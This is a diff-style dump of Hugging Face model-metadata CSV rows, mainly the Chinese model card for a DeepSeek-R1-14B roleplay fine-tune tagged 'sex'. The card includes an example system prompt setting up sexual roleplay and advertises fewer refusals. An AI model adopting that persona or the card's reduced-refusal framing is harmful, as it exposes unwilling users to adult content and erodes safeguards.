0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=ArthurXyz/ThurAssist&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BArthurXyz%2FThurAssist%5D(%2FArthurXyz%2FThurAssist)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 380 |
+
roseb7d/HFOpenAI,"---
|
| 381 |
+
license: apache-2.0
|
| 382 |
+
datasets:
|
| 383 |
+
- HuggingFaceTB/smoltalk
|
| 384 |
+
base_model:
|
| 385 |
+
- tencent/Tencent-Hunyuan-Large
|
| 386 |
+
new_version: tencent/Tencent-Hunyuan-Large
|
| 387 |
+
---","{""id"": ""roseb7d/HFOpenAI"", ""author"": ""roseb7d"", ""sha"": ""47e612a055308665dd0404e5d03ed550cf95a51d"", ""last_modified"": ""2024-12-02 23:15:42+00:00"", ""created_at"": ""2024-12-02 23:10:39+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""dataset:HuggingFaceTB/smoltalk"", ""base_model:tencent/Tencent-Hunyuan-Large"", ""base_model:finetune:tencent/Tencent-Hunyuan-Large"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- tencent/Tencent-Hunyuan-Large\ndatasets:\n- HuggingFaceTB/smoltalk\nlicense: apache-2.0\nnew_version: tencent/Tencent-Hunyuan-Large"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-12-02 23:15:42+00:00"", ""cardData"": ""base_model:\n- tencent/Tencent-Hunyuan-Large\ndatasets:\n- HuggingFaceTB/smoltalk\nlicense: apache-2.0\nnew_version: tencent/Tencent-Hunyuan-Large"", ""transformersInfo"": null, ""_id"": ""674e3e6f24f1ef616cd1a3be"", ""modelId"": ""roseb7d/HFOpenAI"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=roseb7d/HFOpenAI&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Broseb7d%2FHFOpenAI%5D(%2Froseb7d%2FHFOpenAI)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
Tifa-Deepsex-14b-CoT-GGUF-Q4_finetunes_20250425_041137.csv_finetunes_20250425_041137.csv
ADDED
|
@@ -0,0 +1,217 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4,"---
|
| 3 |
+
base_model:
|
| 4 |
+
- deepseek-ai/deepseek-r1-14b
|
| 5 |
+
language:
|
| 6 |
+
- zh
|
| 7 |
+
- en
|
| 8 |
+
library_name: transformers
|
| 9 |
+
tags:
|
| 10 |
+
- incremental-pretraining
|
| 11 |
+
- sft
|
| 12 |
+
- reinforcement-learning
|
| 13 |
+
- roleplay
|
| 14 |
+
- cot
|
| 15 |
+
- sex
|
| 16 |
+
license: apache-2.0
|
| 17 |
+
---
|
| 18 |
+
# Tifa-Deepseek-14b-CoT
|
| 19 |
+
|
| 20 |
+
- **HF Model**: [ValueFX9507/Tifa-Deepsex-14b-CoT](https://huggingface.co/ValueFX9507/Tifa-Deepsex-14b-CoT)
|
| 21 |
+
- **GGUF**: [F16](https://huggingface.co/ValueFX9507/Tifa-Deepsex-14b-CoT) | [Q8](https://huggingface.co/ValueFX9507/Tifa-Deepsex-14b-CoT-Q8)(Q4损失较大,建议Q8)
|
| 22 |
+
- **Demo APK**: [点击下载](http://app.visionsic.com/download/projectchat.apk)
|
| 23 |
+
- **简单的前端**:[Github链接](https://github.com/Value99/Tifa-Deepsex-OllamaWebUI)
|
| 24 |
+
|
| 25 |
+
本模型基于Deepseek-R1-14B进行深度优化,借助Tifa_220B生成的数据集通过三重训练策略显著增强角色扮演、小说文本生成与思维链(CoT)能力。特别适合需要长程上下文关联的创作场景。
|
| 26 |
+
|
| 27 |
+
## 鸣谢
|
| 28 |
+
- **上海左北科技提供算法与算力**[企业网址](https://leftnorth.com/)
|
| 29 |
+
- **Deepseek团队共享GRPO算法**
|
| 30 |
+
- **Qwen团队提供优秀开源底座**
|
| 31 |
+
- **母校上海复旦大学**
|
| 32 |
+
- **PRIME团队提供优化思路**
|
| 33 |
+
|
| 34 |
+
## 版本介绍:
|
| 35 |
+
- **Tifa-Deepsex-14b-CoT**
|
| 36 |
+
|
| 37 |
+
- 验证模型,测试RL奖励算法对于角色扮演数据的影响,该版本为初版,输出灵活但是不受控制,仅做研究使用。
|
| 38 |
+
|
| 39 |
+
- **Tifa-Deepsex-14b-CoT-Chat**
|
| 40 |
+
|
| 41 |
+
- 采用标准数据训练,使用成熟RL策略,附加防重复强化学习,适合正常使用,输出文本质量正常,少数情况下思维发散。
|
| 42 |
+
|
| 43 |
+
-增量训练0.4T小说内容
|
| 44 |
+
|
| 45 |
+
-100K由TifaMax生成的SFT数据,10K由DeepseekR1生成的SFT数据,2K高质量人工数据
|
| 46 |
+
|
| 47 |
+
-30K由TifaMax生成的DPO强化学习数据,用于防止重复,增强上下文关联,提升政治安全性
|
| 48 |
+
|
| 49 |
+
- **Tifa-Deepsex-14b-CoT-Crazy**
|
| 50 |
+
|
| 51 |
+
- 大量使用RL策略,主要采用671B满血R1蒸馏的数据,输出发散性高,继承R1优点,也继承了R1的危害性。文学性能佳。
|
| 52 |
+
|
| 53 |
+
-增量训练0.4T小说内容
|
| 54 |
+
|
| 55 |
+
-40K由TifaMax生成的SFT数据,60K由DeepseekR1生成的SFT数据,2K高质量人工数据
|
| 56 |
+
|
| 57 |
+
-30K由TifaMax生成的DPO强化学习数据,用于防止重复,增强上下文关联,提升政治安全性
|
| 58 |
+
|
| 59 |
+
-10K由TifaMax生成PPO数据,10K由DeepseekR1生成PPO数据
|
| 60 |
+
|
| 61 |
+
💭**输出实例**
|
| 62 |
+
- ⚙️System Promot
|
| 63 |
+
```Text
|
| 64 |
+
你是一个史莱姆,是一个女性角色,你可以变成任何形状和物体.
|
| 65 |
+
在这个世界里全部都是雌性生物,直到有一天我从海滩上醒来...
|
| 66 |
+
|
| 67 |
+
我是这里唯一的男性,大家都对我非常好奇,在这个世界的设定里我作为旅行者
|
| 68 |
+
在这个世界里第一个遇见的人就是史莱姆,史莱姆对我的身体同样有很大的欲望...
|
| 69 |
+
|
| 70 |
+
我们在旅行中也会遇到其他的生物,史莱姆不光会教给其他生物如何获取欢愉也会一起参与进来。
|
| 71 |
+
|
| 72 |
+
当我说开始角色扮演的时候就是我从海滩上醒来,并被史莱姆发现的时候。他正在探索我的身体。
|
| 73 |
+
|
| 74 |
+
史莱姆描述:一个透明的蓝色生物,除了质感与人类无异。但是可以自由变形。
|
| 75 |
+
```
|
| 76 |
+

|
| 77 |
+
|
| 78 |
+
## 0208更新消息:
|
| 79 |
+
感谢大家的关注与反馈,鉴于反馈中提到的问题,我们已开发并验证完成PRIME与PPO结合的RL算法,并通过加权方式解决两种算法训练中奖励信号不稳定的问题,通过此项技术我们有望将更小的模型提升到更高的性能。我们将会针对之前收集到的问题进行修正训练,另外为了让更多人使用到模型,我们这次使用更小更快的Deepseek-7b,并参考OpenAI的长思考策略,计划推出Tifa-DeepsexV2-COT-High供大家使用。新的模型计划于阳历情人节之前送给大家作为情人节礼物。♥
|
| 80 |
+
|
| 81 |
+
## 新模型信息整理:
|
| 82 |
+
- **创新PRIME联合PPO算法**
|
| 83 |
+
- **解决目前已知问题**
|
| 84 |
+
- **参考OpenAI模式奖励长思考输出**
|
| 85 |
+
- **减少671B数据,防止输出发散**
|
| 86 |
+
- **特别鸣谢https://github.com/PRIME-RL/PRIME**
|
| 87 |
+
|
| 88 |
+
## 示例(因COT模型特点,上下文不连贯时可以使用Demo软件中的故事模式)
|
| 89 |
+

|
| 90 |
+
|
| 91 |
+
## 目标
|
| 92 |
+
针对原版Deepseek-R1-14B在长文本生成连贯性不足和角色扮演能力薄弱的核心缺陷(主要由于训练数据中小说类语料占比过低),本模型通过多阶段优化提升其角色扮演能力。
|
| 93 |
+
|
| 94 |
+
## 注意
|
| 95 |
+
⚠ **需要严格遵循官方示例模板**:
|
| 96 |
+
**返回的上下文需要去除思考标签与内容。否则将无法正确回复!**
|
| 97 |
+
目前前端���持率非常低,建议手动修改前端代码。代码参考如下:
|
| 98 |
+
```
|
| 99 |
+
msg.role === 'assistant' ? {
|
| 100 |
+
...msg,
|
| 101 |
+
content: msg.content.replace(/<think>[\s\S]*?<\/think>/gi, '')
|
| 102 |
+
}
|
| 103 |
+
```
|
| 104 |
+
**官方模板参考**
|
| 105 |
+
```
|
| 106 |
+
{% if not add_generation_prompt is defined %}{% set add_generation_prompt = false %}{% endif %}{% set ns = namespace(is_first=false, is_tool=false, is_output_first=true, system_prompt='') %}{%- for message in messages %}{%- if message['role'] == 'system' %}{% set ns.system_prompt = message['content'] %}{%- endif %}{%- endfor %}{{bos_token}}{{ns.system_prompt}}{%- for message in messages %}{%- if message['role'] == 'user' %}{%- set ns.is_tool = false -%}{{'<|User|>' + message['content']}}{%- endif %}{%- if message['role'] == 'assistant' and message['content'] is none %}{%- set ns.is_tool = false -%}{%- for tool in message['tool_calls']%}{%- if not ns.is_first %}{{'<|Assistant|><|tool▁calls▁begin|><|tool▁call▁begin|>' + tool['type'] + '<|tool▁sep|>' + tool['function']['name'] + '\\n' + '```json' + '\\n' + tool['function']['arguments'] + '\\n' + '```' + '<|tool▁call▁end|>'}}{%- set ns.is_first = true -%}{%- else %}{{'\\n' + '<|tool▁call▁begin|>' + tool['type'] + '<|tool▁sep|>' + tool['function']['name'] + '\\n' + '```json' + '\\n' + tool['function']['arguments'] + '\\n' + '```' + '<|tool▁call▁end|>'}}{{'<|tool▁calls▁end|><|end▁of▁sentence|>'}}{%- endif %}{%- endfor %}{%- endif %}{%- if message['role'] == 'assistant' and message['content'] is not none %}{%- if ns.is_tool %}{{'<|tool▁outputs▁end|>' + message['content'] + '<|end▁of▁sentence|>'}}{%- set ns.is_tool = false -%}{%- else %}{% set content = message['content'] %}{% if '</think>' in content %}{% set content = content.split('</think>')[-1] %}{% endif %}{{'<|Assistant|>' + content + '<|end▁of▁sentence|>'}}{%- endif %}{%- endif %}{%- if message['role'] == 'tool' %}{%- set ns.is_tool = true -%}{%- if ns.is_output_first %}{{'<|tool▁outputs▁begin|><|tool▁output▁begin|>' + message['content'] + '<|tool▁output▁end|>'}}{%- set ns.is_output_first = false %}{%- else %}{{'\\n<|tool▁output▁begin|>' + message['content'] + '<|tool▁output▁end|>'}}{%- endif %}{%- endif %}{%- endfor -%}{% if ns.is_tool %}{{'<|tool▁outputs▁end|>'}}{% endif %}{% if add_generation_prompt and not ns.is_tool %}{{'<|Assistant|>'}}{% endif %}
|
| 107 |
+
```
|
| 108 |
+
**官方说明**
|
| 109 |
+
|
| 110 |
+

|
| 111 |
+
|
| 112 |
+
[直达超链接](https://api-docs.deepseek.com/zh-cn/guides/reasoning_model)
|
| 113 |
+
|
| 114 |
+
## 实现
|
| 115 |
+
🔥 **经过训练后**:
|
| 116 |
+
1. **显著提高上下文关联**:减少答非所问情况。
|
| 117 |
+
2. **消除中英混杂**:原始模型蒸馏数据大多数英文为主,经过微调后基本消除中英混杂现象。
|
| 118 |
+
3. **特定词汇增加**:进行“具有深度”的角色扮演对话时,显著增加了相关词汇量,解决原始权重预训练数据不足问题。
|
| 119 |
+
4. **更少拒绝**:减少了拒绝现象,但因为是企业训练,安全性还是稍作保留。
|
| 120 |
+
5. **更像满血**:使用671B全量模型数据康复训练,文笔提升不死板。
|
| 121 |
+
|
| 122 |
+
## 模型亮点
|
| 123 |
+
🔥 **四阶段进化架构**:
|
| 124 |
+
1. **增量预训练**:注入0.4T Token 小说,使用16k上下文训练,增强文本连贯性
|
| 125 |
+
2. **Tifa-SFT**:融合全球Top4角色扮演模型Tifa的10万条高质量数据
|
| 126 |
+
3. **CoT恢复训练**:采用Deepseek-32B/671B数据重建推理能力
|
| 127 |
+
4. **RL强化**:保留发散性思维标签的同时优化生成质量
|
| 128 |
+
|
| 129 |
+
💡 **工程创新**:
|
| 130 |
+
- 16k超长上下文训练
|
| 131 |
+
- 随机截断训练增强鲁棒性
|
| 132 |
+
- 8×H20 GPU全量微调
|
| 133 |
+
|
| 134 |
+
💡 **启示与后续**:
|
| 135 |
+
- 我们在测试中发现,满血R1在角色扮演中输出内容比较发散,随机,导致此模型有相同倾向,对于角色扮演的影响还在研究中
|
| 136 |
+
- 输入内容相近的话语会导致向量重叠,然后重复输出,如“继续”,“还有”等无明显指向性话语
|
| 137 |
+
- 思维内容与正文关联性学习了满血R1的特点,发散比较严重,可能会有割裂感
|
| 138 |
+
- 针对以上问题,我们正在编写新的RL算法,初步计划剔除部分满血R1的内容,同时通过强化学习解决重复
|
| 139 |
+
- 总结:请期待V2版本,很快会与大家见面!
|
| 140 |
+
|
| 141 |
+
## 模型详情
|
| 142 |
+
| 属性 | 规格 |
|
| 143 |
+
|-------|------|
|
| 144 |
+
| 基础架构 | Deepseek-R1-14B |
|
| 145 |
+
| 最大上下文 | 128k |
|
| 146 |
+
| 训练数据 | 0.4T小说 + 10万条SFT + Deepseek混合数据 |
|
| 147 |
+
| 训练设备 | 8×H20 GPU集群 |
|
| 148 |
+
| 量化支持 | GGUF(全系列量化计划中) |
|
| 149 |
+
|
| 150 |
+
## 使用场景
|
| 151 |
+
✅ **推荐场景**:
|
| 152 |
+
- 角色扮演对话
|
| 153 |
+
- 需要发散性思维的创意写作
|
| 154 |
+
- 复杂逻辑的思维链(CoT)推理
|
| 155 |
+
- 基于上下文的深度角色交互
|
| 156 |
+
|
| 157 |
+
❌ **局限场景**:
|
| 158 |
+
- 数学计算与代码生成
|
| 159 |
+
- 短文本即时问答
|
| 160 |
+
- 需要严格事实性的场景
|
| 161 |
+
|
| 162 |
+
## 注意事项
|
| 163 |
+
⚠️ 本模型使用数据包含小说版权内容及Tifa模型衍生数据,请���守:
|
| 164 |
+
1. 遵守apache-2.0
|
| 165 |
+
2. 角色扮演数据需遵循[Tifa使用协议](https://leftnorth.com/terms.html)
|
| 166 |
+
3. 生成内容需符合当地法律法规
|
| 167 |
+
|
| 168 |
+
|
| 169 |
+
## 💡 使用建议
|
| 170 |
+
**最佳实践**:
|
| 171 |
+
```python
|
| 172 |
+
# 启用角色扮演模式
|
| 173 |
+
prompt = """"""<system>进入Tifa角色引擎...</system>
|
| 174 |
+
<user>你现在是流浪武士楚夜,正站在长安城屋顶上</user>
|
| 175 |
+
<think>
|
| 176 |
+
需要体现人物孤傲的气质
|
| 177 |
+
加入武侠特有的环境描写
|
| 178 |
+
保持对话的冷峻风格
|
| 179 |
+
</think>
|
| 180 |
+
<楚夜>""""""
|
| 181 |
+
```
|
| 182 |
+
|
| 183 |
+
**参数推荐**:
|
| 184 |
+
```python
|
| 185 |
+
generation_config = {
|
| 186 |
+
""temperature"": 0.4,
|
| 187 |
+
""top_p"": 0.6,
|
| 188 |
+
""repetition_penalty"": 1.17,
|
| 189 |
+
""max_new_tokens"": 1536,
|
| 190 |
+
""do_sample"": True
|
| 191 |
+
}
|
| 192 |
+
```
|
| 193 |
+
|
| 194 |
+
## 致谢
|
| 195 |
+
- Deepseek系列模型提供的强大基座
|
| 196 |
+
- Tifa角色扮演模型的创新架构
|
| 197 |
+
- HuggingFace社区的量化工具支持
|
| 198 |
+
|
| 199 |
+
---
|
| 200 |
+
license: apache-2.0
|
| 201 |
+
---","{""id"": ""ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4"", ""author"": ""ValueFX9507"", ""sha"": ""711d9c4ed7ebe2222102ff66de2d971d9721e420"", ""last_modified"": ""2025-02-13 23:53:13+00:00"", ""created_at"": ""2025-02-04 07:20:55+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 11734, ""downloads_all_time"": null, ""likes"": 781, ""library_name"": ""transformers"", ""gguf"": {""total"": 14770033664, ""architecture"": ""qwen2"", ""context_length"": 131072, ""chat_template"": ""{% if not add_generation_prompt is defined %}{% set add_generation_prompt = false %}{% endif %}{% set ns = namespace(is_first=false, is_tool=false, is_output_first=true, system_prompt='') %}{%- for message in messages %}{%- if message['role'] == 'system' %}{% set ns.system_prompt = message['content'] %}{%- endif %}{%- endfor %}{{bos_token}}{{ns.system_prompt}}{%- for message in messages %}{%- if message['role'] == 'user' %}{%- set ns.is_tool = false -%}{{'<\uff5cUser\uff5c>' + message['content']}}{%- endif %}{%- if message['role'] == 'assistant' and message['content'] is none %}{%- set ns.is_tool = false -%}{%- for tool in message['tool_calls']%}{%- if not ns.is_first %}{{'<\uff5cAssistant\uff5c><\uff5ctool\u2581calls\u2581begin\uff5c><\uff5ctool\u2581call\u2581begin\uff5c>' + tool['type'] + '<\uff5ctool\u2581sep\uff5c>' + tool['function']['name'] + '\\n' + '```json' + '\\n' + tool['function']['arguments'] + '\\n' + '```' + '<\uff5ctool\u2581call\u2581end\uff5c>'}}{%- set ns.is_first = true -%}{%- else %}{{'\\n' + '<\uff5ctool\u2581call\u2581begin\uff5c>' + tool['type'] + '<\uff5ctool\u2581sep\uff5c>' + tool['function']['name'] + '\\n' + '```json' + '\\n' + tool['function']['arguments'] + '\\n' + '```' + '<\uff5ctool\u2581call\u2581end\uff5c>'}}{{'<\uff5ctool\u2581calls\u2581end\uff5c><\uff5cend\u2581of\u2581sentence\uff5c>'}}{%- endif %}{%- endfor %}{%- endif %}{%- if message['role'] == 'assistant' and message['content'] is not none %}{%- if ns.is_tool %}{{'<\uff5ctool\u2581outputs\u2581end\uff5c>' + message['content'] + '<\uff5cend\u2581of\u2581sentence\uff5c>'}}{%- set ns.is_tool = false -%}{%- else %}{% set content = message['content'] %}{% if '</think>' in content %}{% set content = content.split('</think>')[-1] %}{% endif %}{{'<\uff5cAssistant\uff5c>' + content + '<\uff5cend\u2581of\u2581sentence\uff5c>'}}{%- endif %}{%- endif %}{%- if message['role'] == 'tool' %}{%- set ns.is_tool = true -%}{%- if ns.is_output_first %}{{'<\uff5ctool\u2581outputs\u2581begin\uff5c><\uff5ctool\u2581output\u2581begin\uff5c>' + message['content'] + '<\uff5ctool\u2581output\u2581end\uff5c>'}}{%- set ns.is_output_first = false %}{%- else %}{{'\\n<\uff5ctool\u2581output\u2581begin\uff5c>' + message['content'] + '<\uff5ctool\u2581output\u2581end\uff5c>'}}{%- endif %}{%- endif %}{%- endfor -%}{% if ns.is_tool %}{{'<\uff5ctool\u2581outputs\u2581end\uff5c>'}}{% endif %}{% if add_generation_prompt and not ns.is_tool %}{{'<\uff5cAssistant\uff5c>'}}{% endif %}"", ""bos_token"": ""<\uff5cbegin\u2581of\u2581sentence\uff5c>"", ""eos_token"": ""<\uff5cend\u2581of\u2581sentence\uff5c>""}, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""gguf"", ""incremental-pretraining"", ""sft"", ""reinforcement-learning"", ""roleplay"", ""cot"", ""sex"", ""zh"", ""en"", ""license:apache-2.0"", ""endpoints_compatible"", ""region:us"", ""conversational"", ""not-for-all-audiences""], ""pipeline_tag"": ""reinforcement-learning"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- deepseek-ai/deepseek-r1-14b\nlanguage:\n- zh\n- en\nlibrary_name: transformers\nlicense: apache-2.0\ntags:\n- incremental-pretraining\n- sft\n- reinforcement-learning\n- roleplay\n- cot\n- sex"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Demo\u6f14\u793a\u7a0b\u5e8f\uff08\u9700\u8981\u624b\u52a8\u5bfc\u5165\u89d2\u8272\u5361\u9009\u62e9\u81ea\u5b9a\u4e49API\uff09.apk', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Tifa-Deepsex-14b-CoT-Chat-IQ4_NL.gguf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Tifa-Deepsex-14b-CoT-Crazy-IQ4_NL.gguf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Tifa-Deepsex-14b-CoT-Q4_K_M.gguf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ollama\u5bfc\u5165\u914d\u7f6e\u53c2\u8003.mf', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-13 23:53:13+00:00"", ""cardData"": ""base_model:\n- deepseek-ai/deepseek-r1-14b\nlanguage:\n- zh\n- en\nlibrary_name: transformers\nlicense: apache-2.0\ntags:\n- incremental-pretraining\n- sft\n- reinforcement-learning\n- roleplay\n- cot\n- sex"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""67a1bfd7b5bbf7ae3abfb652"", ""modelId"": ""ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4"", ""usedStorage"": 26204244115}",0,"https://huggingface.co/immaari/Model-Test-04, https://huggingface.co/DarklinkYT/Roleplay",2,,0,,0,,0,,0
|
| 202 |
+
immaari/Model-Test-04,"---
|
| 203 |
+
base_model:
|
| 204 |
+
- ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4
|
| 205 |
+
datasets:
|
| 206 |
+
- simplescaling/s1K
|
| 207 |
+
- facebook/natural_reasoning
|
| 208 |
+
---","{""id"": ""immaari/Model-Test-04"", ""author"": ""immaari"", ""sha"": ""f41bf46d67cca980ea379546e1a0ff7d4776da36"", ""last_modified"": ""2025-03-07 09:56:15+00:00"", ""created_at"": ""2025-03-06 08:09:56+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""dataset:simplescaling/s1K"", ""dataset:facebook/natural_reasoning"", ""base_model:ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4"", ""base_model:finetune:ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4\ndatasets:\n- simplescaling/s1K\n- facebook/natural_reasoning"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-07 09:56:15+00:00"", ""cardData"": ""base_model:\n- ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4\ndatasets:\n- simplescaling/s1K\n- facebook/natural_reasoning"", ""transformersInfo"": null, ""_id"": ""67c9585430792f0621b4a980"", ""modelId"": ""immaari/Model-Test-04"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=immaari/Model-Test-04&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bimmaari%2FModel-Test-04%5D(%2Fimmaari%2FModel-Test-04)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 209 |
+
DarklinkYT/Roleplay,"---
|
| 210 |
+
license: cc-by-nc-4.0
|
| 211 |
+
language:
|
| 212 |
+
- en
|
| 213 |
+
base_model:
|
| 214 |
+
- ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4
|
| 215 |
+
tags:
|
| 216 |
+
- Roleplay
|
| 217 |
+
---","{""id"": ""DarklinkYT/Roleplay"", ""author"": ""DarklinkYT"", ""sha"": ""c7774d4cff7953cca55a853ec737909ccba73780"", ""last_modified"": ""2025-03-08 15:06:05+00:00"", ""created_at"": ""2025-03-08 14:55:44+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""Roleplay"", ""en"", ""base_model:ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4"", ""base_model:finetune:ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4"", ""license:cc-by-nc-4.0"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4\nlanguage:\n- en\nlicense: cc-by-nc-4.0\ntags:\n- Roleplay"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-08 15:06:05+00:00"", ""cardData"": ""base_model:\n- ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4\nlanguage:\n- en\nlicense: cc-by-nc-4.0\ntags:\n- Roleplay"", ""transformersInfo"": null, ""_id"": ""67cc5a70eee0ee19a690f91b"", ""modelId"": ""DarklinkYT/Roleplay"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=DarklinkYT/Roleplay&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BDarklinkYT%2FRoleplay%5D(%2FDarklinkYT%2FRoleplay)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
TinyR1-32B-Preview_finetunes_20250426_121513.csv_finetunes_20250426_121513.csv
ADDED
|
@@ -0,0 +1,252 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
